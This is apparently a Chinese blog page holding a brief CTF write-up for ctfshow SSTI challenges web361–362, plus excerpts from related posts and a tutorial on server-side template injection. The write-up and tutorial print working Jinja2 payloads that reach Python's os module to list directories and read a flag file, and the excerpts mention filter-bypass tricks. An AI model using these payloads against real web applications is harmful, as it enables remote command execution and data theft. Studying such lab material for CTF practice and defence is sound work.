web入门361~372SSTI

最新推荐文章于 2025-12-01 22:31:44 发布

原创最新推荐文章于 2025-12-01 22:31:44 发布 · 170 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全

CTFshow web入门专栏收录该内容

5 篇文章

订阅专栏

SSTI(Server-Side TemplateInjection)服务端模板注入攻击，通过与服务端模板的输入输出交互，在过滤不严格的情况下，构造恶意输入数据，从而达到读取文件或者getshell的目的。

大佬对SSTI的总结

flask之ssti模版注入从零到入门

模板

web361

?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

?name={{ config.__class__.__init__.__globals__['os'].popen('cat ../flag').read() }}

web362

同361

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

熊猫叫喵喵喵

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ctfshow web入门 SSTI注入 web361--web368

2301_81040377的博客

05-15

625

过滤了中括号下划线单引号双引号 globals、getitem args。说实话这里对py不太好的朋友有点不友好，因为payload都是py的。这里用popen方法来执行命令。上题一样的payload可以用。这里是把引号过滤了我们可以用。然后使用flask过滤器。上题一样的payload。hint:考点就是题目。

SSTI原理以及ctf.show的SSTI(web361-web362)

wanan的博客

09-30

958

SSTI原理以及ctf.show的SSTI(web361-web362)

参与评论您还未登录，请先登录后发表或查看评论

ctfshow-web361(SSTI)

m0_62094846的博客

04-23

750

看到Hello，猜测输入的参数是name

CTFSHOW SSTI

m0_64180167的博客

09-30

458

这里可以使用自定义的变量来绕过 request.values.a 类似于自己定义的变量只需要在}}后面传递参数即可这里是我们需要跑的脚本类型我们需要找到popen来执行命令我们就可以通过遍历类然后通过__getitem__找到方法request然后来查询popen写个脚本name="print(i)else:continue跑出来132。

SSTI练习 web361--web372

qing_chuan_的博客

06-15

361

我一步一步试了试，过滤了几个数字2,3等，正好把我可用的os模块没法用了，上网看了好多大佬们的wp可以用全角数字来代替正常数字。这里要提醒我自己一下，这里到用到use_for,自己在哪里拼了半天就是不对。要寄漏，原来过了单双引号啊，当然要用老方法了，request拼接。用subprocess.Popen(),也不行。这题开始过滤了，过了啥，上一题大佬的脚本仍然可以用。哈哈哈，终于到了{}了，直接{%%}+print。加了args过滤，用cookie就好了。上一题全角数字的不能用了。

SSTI模板注入漏洞详解(包含ctfshow web入门361)

你们de4月天的博客

03-16

2529

服务端接收了攻击者的恶意输入以后，未经任何处理就将其作为 Web 应用模板内容的一部分，模板引擎在进行目标编译渲染的过程中，执行了攻击者插入的可以破坏模板的语句，从而达到攻击者的目的。

ctfshow SSTI web361-web372 wp

mumuzi的博客

02-08

2663

文章目录认识SSTIweb361web362web363web364web365web366web367web368web369web370web371web372一些绕过只过滤[]过滤[]和.(点)过滤关键词过滤{{}}过滤数字过滤chr过滤单双引号认识SSTI flask之ssti模版注入从零到入门 SSTI模板注入绕过（进阶篇）然后搬一下feng师傅的笔记CTFshow-WEB入门-SSTI __class__ 类的一个内置属性，表示实例对象的类。 __base__

2024年网安最新ctfshow web入门 SSTI

2401_84297796的博客

05-03

815

返回一个包含Python中所有类的列表，这些类都是直接或间接从。选择了列表中的第133个元素（因为索引是从0开始的）。它将arg过滤掉了，所以没有办法直接GET传参。但是传参会自动补齐双引号，所以索性不加了。轮流试试每个数字，发现只有2和3被过滤。经过各种字母和符号尝试，发现会过滤“”属性，可以获得一个字典，其中包含。类的基类列表，其中第一个元素是。命令，这个命令通常用于读取名为。类定义时可用的所有全局变量。试试把“”进行url编码看看。提示“名字就是考点”使用全角数字进行绕过。关闭使用半角输入模式。

ctfshow web入门（SSTI）

m0_62422842的博客

06-18

1711

ctfshow的web入门中ssti题目的总结

ctfshow——web入门361~368

uwvwko的博客

05-05

684

最近练习ssti当 Web 应用程序使用模板引擎动态生成 HTML 页面或其他类型的输出时，如果用户输入未经过充分验证或转义就被直接嵌入到模板中，就可能发生 SSTI 攻击。攻击者可以利用这个弱点注入恶意模板代码，该代码将在服务器端执行。eg： {{}}在Jinja2中作为变量包裹标识符，Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{2*2}}会被解析成4。因此才有了现在的模板注入漏洞。往往变量我们使用{{恶意代码}}。

ctfshow-web入门-SSTI（web361-web368）上

Welcome To Myon'Blog !

11-13

1245

这个 payload 是一次性的，因为 pop 会删除里面的键，导致环境崩溃。对于这种没有过滤的，还有其他很多很多方法，这里就不列举了。前面的 payload 太长了，构造起来比较麻烦和乱。更保险的是使用 __getitem__ ，方法同上。（1）使用子类可以直接调用的函数来打。模糊测试看一下，过滤了 2 和 3。双大括号中过滤了 request。测试一下存在 SSTI 注入。并且 post 传参不允许。那就传给 cookie 吧。但是 {% %} 中可用。一起传给 cookie。

Ctfshow web入门 SSTI 模板注入篇 web361-web372 详细题解全

Jay17的博客

08-10

2307

Ctfshow web入门 SSTI 模板注入篇 web361-web372 详细题解全

ctfshow web入门 ssti web361~web372

qq_62989306的博客

09-13

1727

ssti之数字绕过、request绕过、字符串拼接、chr绕过、反弹绕过、dnslog外带、读文件盲注……

[Web安全学习] SSTL模板注入总结

Y1seco的博客

08-18

1707

前置知识引自 bfengj __class__ 类的一个内置属性，表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类，以元组形式，类型的实例通常没有属性 __bases__ __mro__ 此属性是由类组成的元组，在方法解析期间会基于它来查找基类。 __subclasses__() 返回这个类的子类集合，Each class keeps a list of w

【Sql Server】sql server 2019设置远程访问，外网服务器需要设置好安全组入方向规则

2509_94200811的博客

12-01

611

本地电脑安装的sql server数据库可视化工具ssms连接到外网服务器的sql server数据库，实现本地化远程链接数据库进行管理和操作。

软件供应链安全“黑洞”：2025安全合规的制品库如何选择？

weixin_44552837的博客

12-01

268

软件供应链攻击频发，依赖组件不可控、流转管控缺失等问题凸显制品管理风险，制品库亟需安全合规的产品选择。国产制品管理平台可构建全生命周期防御体系，以可信源建设、上传即扫描、全链路追溯及信创适配筑牢防线，是企业研发制品仓库的选型优选。

大模型生成（题目）安全

CSPhD-winston的博客

12-01

606

生成管道中加“自动验证器”（QA 模型交叉验证）、内容过滤器（toxicity / safety classifier）、可控生成（约束 prompt / planning），以及对抗训练来提高鲁棒性。可用指标：错误率（事实/逻辑）、不可答率（unanswerable）、有害性评分（自动 + 人工标签）、偏见强度（差异化统计）、选项/答案位置偏置、可解释性度量等。构建偏见题模板（性别/种族/阶级/文化敏感话题），通过语法/语义变换扩展（借鉴 JADE 型方法），评估不同模型在题目生成时露出的系统性偏差。

Java安全基础——JNI安全基础

a1001086的博客

11-29

513

Java通过JNI实现与C/C++的交互，可在Java中调用本地代码。具体步骤包括：1)声明native方法；2)加载动态链接库(.dll/.so)；3)使用javac生成头文件；4)实现C/C++函数；5)编译生成动态库；6)在Java中调用。JNI类型对应C++类型，基本类型直接使用，引用类型为对象指针。处理字符串时需注意内存管理，使用GetStringUTFChars获取字符串指针，最后调用ReleaseStringUTFChars释放资源。该方法可扩展Java功能，但需考虑跨平台和安全问题。

MySQL offline_mode：安全隔离流量，高效完成数据库维护

最新发布

翔云

12-01

640

MySQL的offline_mode是用于数据库维护的重要配置，开启后仅允许管理员连接，普通用户连接会被拒绝或断开。它不会影响复制线程，确保主从同步不受干扰。该功能适用于服务器升级、数据备份等维护场景，需配合CONNECTION_ADMIN和SYSTEM_VARIABLES_ADMIN权限使用。使用时需注意：会立即中断业务连接，建议在维护窗口期操作，并确保应用连接池能正常恢复。通过SET GLOBAL offline_mode=ON/OFF可快速切换状态，为数据库维护提供安全环境。

ctfshow web入门ssti

01-25

### CTFShow Web 入门 SSTI 教程 #### 题目描述在一个基于 PHP 的 Web 应用中，存在一个可以接受用户输入并渲染到网页上的功能。该功能使用了模板引擎来处理用户的输入数据。 #### 解题思路在服务器端模板注入 (Server-Side Template Injection, SSTI) 攻击中，攻击者利用应用程序中的漏洞向模板引擎传递恶意代码，从而实现远程命令执行或其他危害行为。对于本道题目而言： - **确认使用的模板引擎** 如果应用采用的是 Twig 或其他支持复杂表达式的模板库，则可能存在 SSTI 漏洞的风险[^2]。 - **测试是否存在 SSTI 漏洞** 可以尝试提交一些特殊的字符串作为输入，观察其输出结果是否有异常变化。例如，发送 `{{7*7}}` 并期望看到计算的结果而不是原始字符本身被显示出来。 - **探索可利用的功能** 当发现确实能够影响模板解析过程之后，下一步就是要找出如何进一步控制这些操作。这可能涉及到调用内置函数、读取文件内容甚至是执行系统指令等动作。针对此案例的具体解法如下所示：假设目标站点有一个 URL 参数名为 `name` ，用于接收用户名字并在页面上展示欢迎信息。此时可以通过构造特定形式的数据包来进行试探性的攻击尝试： ```http GET /index.php?name={{7*'a'}} HTTP/1.1 Host: example.com ``` 如果返回的内容包含了七个连续的小写字母 'aaaaaaa' 而不是原样呈现 {{7*'a'}}, 则说明很可能存在 SSTI 缺陷。为了验证这一点以及获取更多权限，还可以继续深入挖掘可用的方法。比如查看当前工作目录下的所有文件列表： ```http GET /index.php?name={{self._env.__init__.__globals__['os'].getcwd()}} HTTP/1.1 Host: example.com ``` 一旦成功触发上述语句并将路径反馈至前端界面，就意味着已经掌握了对服务器内部结构的部分了解，进而为进一步渗透提供了条件。当然，在实际环境中应当遵循合法合规的原则开展安全研究活动，严禁非法入侵他人信息系统的行为发生。